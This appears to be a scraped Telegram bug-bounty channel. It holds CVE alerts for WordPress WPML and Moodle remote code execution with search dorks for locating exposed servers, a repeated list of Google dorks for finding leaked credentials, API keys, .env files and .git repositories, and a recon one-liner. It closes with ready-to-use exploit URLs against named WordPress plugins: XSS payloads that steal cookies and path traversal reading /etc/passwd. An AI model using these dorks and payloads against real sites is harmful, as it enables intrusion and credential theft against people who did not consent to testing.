This media is not supported in your browser
VIEW IN TELEGRAM
Wake Up! Your Mom and Dad are waiting for your success ๐คฉ They're both running out of time.
Please open Telegram to view this post
VIEW IN TELEGRAM
โค19๐ข4โคโ๐ฅ2๐2๐คฃ1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - AutoRecon/AutoRecon: AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration ofโฆ
AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services. - AutoRecon/AutoRecon
๐คฃ3
CVE-2024-6386: RCE in WPML WordPress Plugin, 9.9 rating ๐ฅ
Due to the lack of input validation, an attacker can execute code on the affected server.
Search at Netlas.io:
๐ Link: https://nt.ls/caxUk
๐ Dork: http.body:"plugins/wpml"
Read more: https://sec.stealthcopter.com/wpml-rce-via-twig-ssti/
Due to the lack of input validation, an attacker can execute code on the affected server.
Search at Netlas.io:
๐ Link: https://nt.ls/caxUk
๐ Dork: http.body:"plugins/wpml"
Read more: https://sec.stealthcopter.com/wpml-rce-via-twig-ssti/
๐6๐คฃ1
Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: ๐๐ป
1. Discovering Exposed Files:
- intitle:"index of" "site:target.com"
- filetype:log inurl:log site:target.com
- filetype:sql inurl:sql site:target.com
- filetype:env inurl:.env site:target.com
2. Finding Sensitive Directories:
- inurl:/phpinfo.php site:target.com
- inurl:/admin site:target.com
- inurl:/backup site:target.com
- inurl:wp- site:target.com
3. Exposed Configuration Files:
- filetype:config inurl:config site:target.com
- filetype:ini inurl:wp-config.php site:target.com
- filetype:json inurl:credentials site:target.com
4. Discovering Usernames and Passwords:
- intext:"password" filetype:log site:target.com
- intext:"username" filetype:log site:target.com
- filetype:sql "password" site:target.com
5. Finding Database Files:
- filetype:sql inurl:db site:target.com
- filetype:sql inurl:dump site:target.com
- filetype:bak inurl:db site:target.com
6. Exposed Git Repositories:
- inurl:".git" site:target.com
- inurl:"/.git/config" site:target.com
- intitle:"index of" ".git" site:target.com
7. Finding Publicly Exposed Emails:
- intext:"email" site:target.com
- inurl:"contact" intext:"@target.com" -www.target.com
- filetype:xls inurl:"email" site:target.com
8. Discovering Vulnerable Web Servers:
- intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
- intitle:"Index of /" "Apache Server" site:target.com
- intitle:"Welcome to nginx" site:target.com
9. Finding API Keys:
- filetype:env "DB_PASSWORD" site:target.com
- intext:"api_key" filetype:env site:target.com
- intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com
10. Exposed Backup Files:
- filetype:bak inurl:backup site:target.com
- filetype:bak inurl:backup site:target.com
- filetype:zip inurl:backup site:target.com
- filetype:tgz inurl:backup site:target.com
Replace target.com with the domain or target you are focusing on.
#GoogleDorks
#BugHunting
#OSINT
1. Discovering Exposed Files:
- intitle:"index of" "site:target.com"
- filetype:log inurl:log site:target.com
- filetype:sql inurl:sql site:target.com
- filetype:env inurl:.env site:target.com
2. Finding Sensitive Directories:
- inurl:/phpinfo.php site:target.com
- inurl:/admin site:target.com
- inurl:/backup site:target.com
- inurl:wp- site:target.com
3. Exposed Configuration Files:
- filetype:config inurl:config site:target.com
- filetype:ini inurl:wp-config.php site:target.com
- filetype:json inurl:credentials site:target.com
4. Discovering Usernames and Passwords:
- intext:"password" filetype:log site:target.com
- intext:"username" filetype:log site:target.com
- filetype:sql "password" site:target.com
5. Finding Database Files:
- filetype:sql inurl:db site:target.com
- filetype:sql inurl:dump site:target.com
- filetype:bak inurl:db site:target.com
6. Exposed Git Repositories:
- inurl:".git" site:target.com
- inurl:"/.git/config" site:target.com
- intitle:"index of" ".git" site:target.com
7. Finding Publicly Exposed Emails:
- intext:"email" site:target.com
- inurl:"contact" intext:"@target.com" -www.target.com
- filetype:xls inurl:"email" site:target.com
8. Discovering Vulnerable Web Servers:
- intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
- intitle:"Index of /" "Apache Server" site:target.com
- intitle:"Welcome to nginx" site:target.com
9. Finding API Keys:
- filetype:env "DB_PASSWORD" site:target.com
- intext:"api_key" filetype:env site:target.com
- intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com
10. Exposed Backup Files:
- filetype:bak inurl:backup site:target.com
- filetype:bak inurl:backup site:target.com
- filetype:zip inurl:backup site:target.com
- filetype:tgz inurl:backup site:target.com
Replace target.com with the domain or target you are focusing on.
#GoogleDorks
#BugHunting
#OSINT
โค13๐8๐ฅ5๐คฃ1
CVE-2024-43425: RCE in Moodle, PoC is available ๐ฅ๐ฅ๐ฅ
Due to incomplete sanitization in the โcalculated questionsโ feature, attackers can transmit and execute arbitrary code, which can be used to disclose studentsโ confidential information or disrupt the entire learning process.
Search at Netlas.io:
๐ Link: https://nt.ls/6WaFx
๐ Dork: http.headers.set_cookie:"MoodleSession"
Read more: https://blog.redteam-pentesting.de/2024/moodle-rce/
Due to incomplete sanitization in the โcalculated questionsโ feature, attackers can transmit and execute arbitrary code, which can be used to disclose studentsโ confidential information or disrupt the entire learning process.
Search at Netlas.io:
๐ Link: https://nt.ls/6WaFx
๐ Dork: http.headers.set_cookie:"MoodleSession"
Read more: https://blog.redteam-pentesting.de/2024/moodle-rce/
โค8๐5๐คฃ1
Please open Telegram to view this post
VIEW IN TELEGRAM
๐4
โกhttps://github.com/vladko312/SSTImap
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ8
This media is not supported in your browser
VIEW IN TELEGRAM
๐คฃ27๐4๐ฏ1
Presentation.pdf
3.9 MB
Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.
of client-side JavaScript code
to detect DOM-based XSS.
๐7
minikube.pem
test_key.pem
test_rsa_privkey.pem
test_rsa_privkey_encrypted.pem
rsakey.pem
key.pem
certificate.pem
private_key.pem
public_key.pem
privkey.pem
dhparams.pem
ios_push_certificate.pem
keycert.passwd.pem
ca1-key.pem
key-certbot.pem
key2048.pem
private.pem
Please open Telegram to view this post
VIEW IN TELEGRAM
๐7โค5๐5๐ฅ2
โก๏ธCommand for Hidden JS Parameter Discovery.
This command takes your recon game to the next level!โก๏ธ
cat subs.txt | (gau --threads 20 --blacklist jpg,jpeg,gif,png,tiff,ttf,otf,woff,woff2,ico,svg,pdf,txt,mp4,avi,mov,mkv,exe,zip,tar,gz,rar,7z hakrawler --depth 5 --plain --insecure waybackurls || katana -d 5 --js-crawl --auto-redirect --extensions js,json,php,aspx,asp,jsp,html,htm --proxy http://127.0.0.1:8080 ) | sort -u | httpx --silent --threads 200 --status-code --title --tech-detect --content-length --server | tee -a httpx_full.txt | grep -Eiv '\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt|pdf|mp4|avi|mov|mkv|exe|zip|tar|gz|rar|7z|css|doc|docx|xls|xlsx|ppt|pptx)$' | while read url; do vars=$(curl -sL $url | grep -Eo "(var |let |const |function |class |import |export )[a-zA-Z0-9_]+" | sed -e 's, "$url"', -e 's/\(var \|let \|const \|function \|class \|import \|export \)//g' | grep -Eiv '\.js$|\. [a-zA-Z0-9]+\.[a-zA-Z0-9]+$' | sed 's/$/= $FUZZ /'); echo -e "\e[1;33m$url\e[1;32m$vars"; done | tee -a js_parameters.txt
This command takes your recon game to the next level!โก๏ธ
โค18๐4
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - lauritzh/domscan: Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects.
Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects. - lauritzh/domscan
๐1
check this if you have these plugin.
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ10๐5โค1